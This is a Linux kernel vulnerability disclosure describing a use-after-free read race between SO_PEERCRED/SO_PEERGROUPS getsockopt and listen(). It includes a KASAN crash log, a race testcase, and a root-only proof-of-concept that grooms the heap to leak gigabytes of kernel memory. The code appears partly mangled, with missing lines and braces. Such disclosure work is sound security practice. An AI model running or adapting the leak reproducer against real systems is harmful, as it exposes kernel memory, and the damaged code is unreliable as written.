Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())  
# bug description  
In sock_getsockopt() (in net/core/sock.c), the handlers for the  
socket options SO_PEERCRED (which has probably had a data race since forever;  
that race was turned into a UAF read in v2.6.36 by commit "af_unix: Allow  
SO_PEERCRED to work across namespaces") and  
SO_PEERGROUPS (introduced in v4.13 by commit "net: introduce SO_PEERGROUPS  
getsockopt") don't use any locking when copying data from  
sk->sk_peer_cred to userspace.  
This can race with operations that update sk->sk_peer_cred:  
- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)  
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)  
This means that if the creds are replaced and freed at the wrong time, a  
use-after-free read occurs.  
From what I can tell, the impact on the kernel is limited to data leakage.  
Theoretically, it could also lead to an out-of-bounds *write* to  
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket  
whose ->sk_peer_cred is going away; however, in a normal scenario,  
SO_PEERGROUPS would only be called on a socket from accept(), and a  
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred  
on that socket.  
# simple testcase  
This issue can be demonstrated with the following testcase.  
Note that this testcase uses SO_PEERCRED in a weird way: it reads  
the "peer credentials" of a listening socket, which doesn't really make  
any semantic sense. As far as I can tell from reading the code, you  
could also trigger the same UAF by racing SO_PEERCRED with repeated  
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),  
but then the race would get more complicated.  
// compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\"  
#define _GNU_SOURCE  
#include <pthread.h>  
#include <sys/fsuid.h>  
#include <sys/socket.h>  
#include <sys/un.h>  
#include <err.h>  
#include <unistd.h>  
#include <stdio.h>  
#include <sys/syscall.h>  
static int s;  
static uid_t my_uid;  
static gid_t my_gid;  
void *ucred_thread(void *dummy) {  
while (1) {  
struct ucred ucred;  
socklen_t optlen = sizeof(ucred);  
if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))  
int main(void) {  
my_uid = getuid();  
my_gid = getgid();  
s = socket(AF_UNIX, SOCK_STREAM, 0);  
if (s == -1) err(1, \"socket\");  
struct sockaddr_un bind_addr = {  
.sun_family = AF_UNIX,  
.sun_path = \"/tmp/unix-test-socket\"  
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))  
err(1, \"bind\");  
pthread_t thread;  
if (pthread_create(&thread, NULL, ucred_thread, NULL))  
errx(1, \"pthread_create\");  
while (1) {  
if (listen(s, 16))  
// avoid glibc's automatic thread sync in set*id() wrappers!  
// note that setfsuid() doesn't reallocate on no-op request.  
if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))  
err(1, \"setresuid(raw)\");  
This results in the following splat:  
BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)   
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619  
CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014  
Call Trace:  
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))   
print_address_description.constprop.0 (mm/kasan/report.c:257)   
kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)   
sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)   
__sys_getsockopt (net/socket.c:2216)   
__x64_sys_getsockopt (net/socket.c:2232)   
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)   
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)   
RIP: 0033:0x7f93cd99a5ca  
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48  
All code  
0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0  
7: f7 d8 neg %eax  
9: 64 89 01 mov %eax,%fs:(%rcx)  
c: 48 83 c8 ff or $0xffffffffffffffff,%rax  
10: c3 ret   
11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)  
18: 00 00 00   
1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)  
20: 49 89 ca mov %rcx,%r10  
23: b8 37 00 00 00 mov $0x37,%eax  
28: 0f 05 syscall   
2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction  
30: 73 01 jae 0x33  
32: c3 ret   
33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0  
3a: f7 d8 neg %eax  
3c: 64 89 01 mov %eax,%fs:(%rcx)  
3f: 48 rex.W  
Code starting with the faulting instruction  
0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax  
6: 73 01 jae 0x9  
8: c3 ret   
9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6  
10: f7 d8 neg %eax  
12: 64 89 01 mov %eax,%fs:(%rcx)  
15: 48 rex.W  
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037  
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca  
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003  
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700  
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee  
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000  
Allocated by task 618:  
kasan_save_stack (mm/kasan/common.c:38)   
__kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)   
kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)   
prepare_creds (kernel/cred.c:262)   
__sys_setresuid (kernel/sys.c:666)   
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)   
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)   
Freed by task 618:  
kasan_save_stack (mm/kasan/common.c:38)   
kasan_set_track (mm/kasan/common.c:46)   
kasan_set_free_info (mm/kasan/generic.c:362)   
__kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)   
kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)   
rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)   
__do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)   
Last potentially related work creation:  
kasan_save_stack (mm/kasan/common.c:38)   
kasan_record_aux_stack (mm/kasan/generic.c:348)   
call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)   
init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)   
unix_listen (net/unix/af_unix.c:648)   
__sys_listen (net/socket.c:1727)   
__x64_sys_listen (net/socket.c:1734)   
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)   
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)   
The buggy address belongs to the object at ffff8880355c7c40  
which belongs to the cache cred_jar of size 192  
The buggy address is located 36 bytes inside of  
192-byte region [ffff8880355c7c40, ffff8880355c7d00)  
The buggy address belongs to the page:  
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4  
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0  
flags: 0x4000000000010200(slab|head|zone=1)  
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0  
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000  
page dumped because: kasan: bad access detected  
Memory state around the buggy address:  
ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc  
ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc  
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb  
ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc  
# root-only reproducer for normal systems  
The following is a simple reproducer that attempts to use this issue to  
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which  
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)  
from a dangling pointer in groups_to_user().  
(Note: There are two functions called groups_to_user(). The relevant one  
is in net/core/sock.c.)  
This isn't quite a real exploit - it **requires root privileges** to  
call setgroups() and, if userfaultfd is restricted, also to trap a kernel  
fault with userfaultfd. I expect that you could get around those  
limitations with some work though, assuming that the attacker is running  
in a normal Linux userspace.  
Note that this bug can still be used to dump gigabytes of kernel heap  
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the  
out-of-bounds read occurs outside of usercopy code:  
/*
 * Copy every gid in @src to the userspace array @dst, translating each one
 * with from_kgid_munged() for the caller's user namespace.
 *
 * The loop bound is re-read from src->ngroups on every iteration and the
 * copy is done one element at a time with put_user().
 *
 * Returns 0 on success, or -EFAULT if a put_user() fails.
 */
static int groups_to_user(gid_t __user *dst, const struct group_info *src)
{
	struct user_namespace *user_ns = current_user_ns();
	int i;

	for (i = 0; i < src->ngroups; i++)
		if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))
			return -EFAULT;

	return 0;
}
// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread  
#define _GNU_SOURCE  
#include <pthread.h>  
#include <stdbool.h>  
#include <stdlib.h>  
#include <sys/stat.h>  
#include <err.h>  
#include <unistd.h>  
#include <sys/socket.h>  
#include <sys/un.h>  
#include <grp.h>  
#include <sys/wait.h>  
#include <sys/syscall.h>  
#include <fcntl.h>  
#include <sys/eventfd.h>  
#include <limits.h>  
#include <stdio.h>  
#include <sys/ioctl.h>  
#include <sys/mman.h>  
#include <linux/userfaultfd.h>  
#include <linux/membarrier.h>  
// kernel sets upper limit: 65536.  
// up to 2 pages will be served by slabs, we probably don't want that.  
// choose a size between order-3 and order-4 (means needs order-4 page)  
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)  
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)  
#define OUTPUT_MAPPING_LEN 0x400000000  
static int s;  
static int launch_eventfd;  
static unsigned char *output_mapping;  
static void *getsockopt_threadfn(void *dummy) {  
eventfd_t evval;  
if (eventfd_read(launch_eventfd, &evval))  
err(1, \"eventfd_read\");  
socklen_t optlen = INT_MAX;  
if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {  
//system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");  
return NULL;  
void dump(char *label) {  
=== DUMP %s ===\  
\", label);  
system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\");  
int main(void) {  
char dummy_char;  
// set up sleep-inducing mapping  
output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,  
if (output_mapping == MAP_FAILED) err(1, \"mmap\");  
if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))  
err(1, \"mprotect\");  
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);  
if (uffd == -1) err(1, \"userfaultfd\");  
struct uffdio_api api = {  
.api = UFFD_API,  
.features = 0  
if (ioctl(uffd, UFFDIO_API, &api))  
err(1, \"UFFDIO_API\");  
struct uffdio_register reg = {  
.range = {.start = (unsigned long)output_mapping, .len = 0x1000},  
if (ioctl(uffd, UFFDIO_REGISTER, &reg))  
err(1, \"UFFDIO_REGISTER\");  
// prepare getsockopt() thread  
launch_eventfd = eventfd(0, 0);  
if (launch_eventfd == -1) err(1, \"eventfd\");  
pthread_t thread;  
if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))  
errx(1, \"pthread_create\");  
// set up for reallocation primitive  
int realloc_fd = open(\"/proc/self/maps\", O_RDONLY);  
if (realloc_fd == -1) err(1, \"open maps\");  
char tmpdir[] = \"/tmp/blah.XXXXXX\";  
if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\");  
if (chdir(tmpdir)) err(1, \"chdir tmpdir\");  
char dummy_name[100];  
memset(dummy_name, 'A', 99);  
dummy_name[99] = '\\0';  
char move_target[200];  
sprintf(move_target, \"d/%s\", dummy_name);  
mkdir(dummy_name, 0700);  
char file_path[200];  
sprintf(file_path, \"%s/a\", dummy_name);  
int path_len = strlen(tmpdir) + strlen(file_path); // approximate  
int fd = open(file_path, O_CREAT|O_RDWR, 0600);  
if (fd == -1) err(1, \"open deep file\");  
if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED)  
err(1, \"mmap deep\");  
bool half_deep_probed = false;  
while (path_len < ALLOC_SIZE) {  
mkdir(\"d\", 0700);  
if (rename(dummy_name, move_target)) err(1, \"rename\");  
if (rename(\"d\", dummy_name)) err(1, \"rename 2\");  
path_len += strlen(dummy_name) + 1;  
if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) {  
half_deep_probed = true;  
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)  
err(1, \"read maps half-deep\");  
s = socket(AF_UNIX, SOCK_STREAM, 0);  
if (s == -1) err(1, \"socket\");  
struct sockaddr_un bind_addr = {  
.sun_family = AF_UNIX,  
.sun_path = \"/tmp/unix-test-socket\"  
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))  
err(1, \"bind\");  
pid_t child = fork();  
if (child == -1) err(1, \"fork\");  
if (child == 0) {  
gid_t gid_list[NUM_GROUPS];  
gid_t my_gid = getgid();  
for (int i=0; i<NUM_GROUPS; i++) {  
gid_list[i] = my_gid; // (kernel doesn't deduplicate)  
dump(\"before setgroups\");  
if (setgroups(NUM_GROUPS, gid_list))  
err(1, \"setgroups\");  
dump(\"after setgroups, expect -1\");  
if (listen(s, 16))  
err(1, \"listen in child\");  
return 0;  
int status;  
if (waitpid(child, &status, 0) != child)  
err(1, \"wait\");  
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)  
errx(1, \"child didn't exit cleanly\");  
// wildly flailing around in the hope of flushing out the task  
// (but not the creds yet)  
usleep(400 * 1000);  
for (int i=0; i<4; i++)  
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);  
// launch getsockopt, and wait for it to start  
if (eventfd_write(launch_eventfd, 1)) err(1, \"eventfd_write\");  
usleep(500 * 1000);  
// schedule RCU freeing of the creds  
if (listen(s, 16))  
err(1, \"listen in parent\");  
// wait for RCU (twice to be safe - yes, this is senseless voodoo)  
for (int i=0; i<2; i++)  
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);  
// crappy reallocation attempt, should overwrite length with ASCII  
dump(\"pre-reallocation, expect +1\");  
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)  
err(1, \"read maps deep\");  
dump(\"post-reallocation, expect -1\");  
// resume getsockopt  
struct uffdio_zeropage zeropage = {  
.range = {.start = (unsigned long)output_mapping, .len = 0x1000}  
if (ioctl(uffd, UFFDIO_ZEROPAGE, &zeropage)) err(1, \"ZEROPAGE\");  
// wait for getsockopt to finish  
if (pthread_join(thread, NULL)) err(1, \"pthread_join\");  
// dump results  
int pagemap_fd = open(\"/proc/self/pagemap\", O_RDONLY);  
if (pagemap_fd == -1) err(1, \"open pagemap\");  
unsigned long filled_pages = 0;  
for (unsigned long addr = (unsigned long)output_mapping;  
addr < (unsigned long)output_mapping + OUTPUT_MAPPING_LEN;  
addr += 0x1000) {  
uint64_t val;  
if (pread(pagemap_fd, &val, sizeof(val), addr / 0x1000 * 8) != sizeof(val))  
err(1, \"pagemap read\");  
if ((val >> 62) == 0)  
printf(\"got %lu pages\  
\", filled_pages);  
FILE *hexdump = popen(\"hexdump -C\", \"w\");  
if (!hexdump)  
err(1, \"popen\");  
fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump);  
# disclosure deadline  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2021-12-27.  
Found by: